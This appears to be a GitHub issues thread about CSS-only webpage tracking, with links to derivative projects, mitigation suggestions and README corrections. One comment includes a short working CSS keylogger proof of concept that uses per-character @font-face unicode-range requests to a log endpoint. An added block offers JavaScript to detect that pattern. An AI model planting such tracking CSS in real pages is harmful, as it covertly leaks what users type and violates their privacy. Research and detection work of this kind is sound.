jbtronics / crookedstylesheets
Webpage tracking only using CSS (and no JS)
License: MIT License
Hi. First of all thanks for your work.
Your code inspired me to write a small library for tracking CSS (I call it spycss).
You can see sources at https://github.com/Bogdaan/spycss
And small demo at https://github.com/Bogdaan/spycss-demo (live demo - https://spycss.hcbogdan.com)
I will be grateful if you will advise what can be improved.
I just found a bug or something with CSS variables, and it seems to be an easy DoS thing.
Check my repo: https://github.com/ceigh/css-dos
Another solution would be to block the ability to load dynamic content like a PHP file.
What if you created an invisible CSS grid on top of your whole webpage and tracked mouse movement that way? (Sounds way easier and more enjoyable than wrapping everything separately in your markup somehow...
I don't mean this to be snarky or mean - Please consider revising the README without the rampant abuse of commas. Nearly every sentence has an unneeded pause introduced by a comma and it makes fluidly reading through your fascinating notes somewhat more difficult.
After developing the CSS detection in MS Edge, I was not able to detect the duration value.
I'm referring to this pull request where the detection was made for MS Edge -> #16
CSS Exfil Protection is an extension to protect against this vulnerability.
It should be added under "What you can do to prevent tracking with this method" in the Readme.
So, disabling CSS is not a real option, except when you are very worried about your privacy (for example, when you are using the Tor browser, you should maybe disable CSS).
Actually not required because things like user agent, screen resolution, fonts, etc. are already normalized and should be more or less identical for all users of TBB.
Hello, neat CSS trick; it works great on newer browsers that support the CSS methods used. Older browser versions — I tested Firefox v50 and Opera v12 — respond to font tracking only, no other results show; other than that, the CSS on the test page works as expected; i.e., color changes appropriately, etc.
So this is not really a bug…but may be helpful as a mitigation method under the README's prevention section?
You can have the track.php script return a 404. The browser won't cache the response and attempt to get it again on the next event.
Demo page is dead (404); recreate it right on github.io?
Sure, again just a single request per unique character during page visit could be sent, but besides that it seems to work as expected:
<!doctype html>
<title>css keylogger</title>
<style>
@font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
@font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
@font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
@font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
input { font-family: x, 'Comic sans ms'; }
</style>
<input value="a">type `bcd` and watch network log
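A defensive check for the unicode-range pattern in the post above, as an added example that is not part of the thread or the repository: it scans stylesheet text for a font family whose @font-face rules each tie a tiny unicode-range to a different fetchable URL. The names rangeSize and findCharLeakFonts, the thresholds, and the benign "Body" font are assumptions made for illustration.

```javascript
// Flags font families whose @font-face rules map very narrow unicode-ranges
// to distinct fetchable URLs. maxRange and minFaces are assumed thresholds.

// Code points covered by a unicode-range value:
// "U+61" -> 1, "U+4??" -> 256, "U+0041-005A, U+61" -> 27.
function rangeSize(value) {
  let total = 0;
  for (const part of value.split(",")) {
    const m = /^U\+([0-9A-F?]{1,6})(?:-([0-9A-F]{1,6}))?$/i.exec(part.trim());
    if (!m) return Infinity; // unparsable: treat as broad, so never flagged
    if (m[1].includes("?")) {
      total += 16 ** m[1].match(/\?/g).length; // each "?" is one hex digit
    } else {
      const lo = parseInt(m[1], 16);
      total += (m[2] ? parseInt(m[2], 16) : lo) - lo + 1;
    }
  }
  return total;
}

function findCharLeakFonts(css, { maxRange = 4, minFaces = 3 } = {}) {
  const families = new Map();
  const noComments = css.replace(/\/\*[\s\S]*?\*\//g, "");
  for (const [, body] of noComments.matchAll(/@font-face\s*\{([^}]*)\}/gi)) {
    const family = (/font-family\s*:\s*([^;]+)/i.exec(body) || [])[1];
    const range = (/unicode-range\s*:\s*([^;]+)/i.exec(body) || [])[1];
    // Any url() that is not an inline data: URI causes a network request.
    const urls = [...body.matchAll(/url\(\s*(['"]?)(.*?)\1\s*\)/gi)]
      .map((m) => m[2])
      .filter((u) => !/^data:/i.test(u));
    if (!family || !range || !urls.length) continue;
    if (rangeSize(range) > maxRange) continue; // ordinary subset font
    const key = family.trim().replace(/^['"]|['"]$/g, "").toLowerCase();
    if (!families.has(key)) families.set(key, []);
    families.get(key).push({ range: range.trim(), url: urls[0] });
  }
  // Report a family only when enough tiny ranges point at different URLs.
  return [...families]
    .filter(([, faces]) => new Set(faces.map((f) => f.url)).size >= minFaces)
    .map(([family, faces]) => ({ family, faces }));
}

// Sample input: the four rules from the post above, plus a constructed
// benign subset font ("Body") that must not be reported.
const SAMPLE = ["a", "b", "c", "d"].map((c) =>
  `@font-face { font-family: x; src: url(./log?${c}), local(Impact); ` +
  `unicode-range: U+${c.charCodeAt(0).toString(16)}; }`).join("\n") +
  '\n@font-face { font-family: "Body"; src: url(/fonts/body-latin.woff2); ' +
  "unicode-range: U+0000-00FF; }";
```

Calling findCharLeakFonts(SAMPLE) reports only family x with its four per-character URLs; regex-based parsing like this is a triage aid and does not replace a real CSS parser.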
"completly" is in your README.md a few times where you actually want it to be "completely"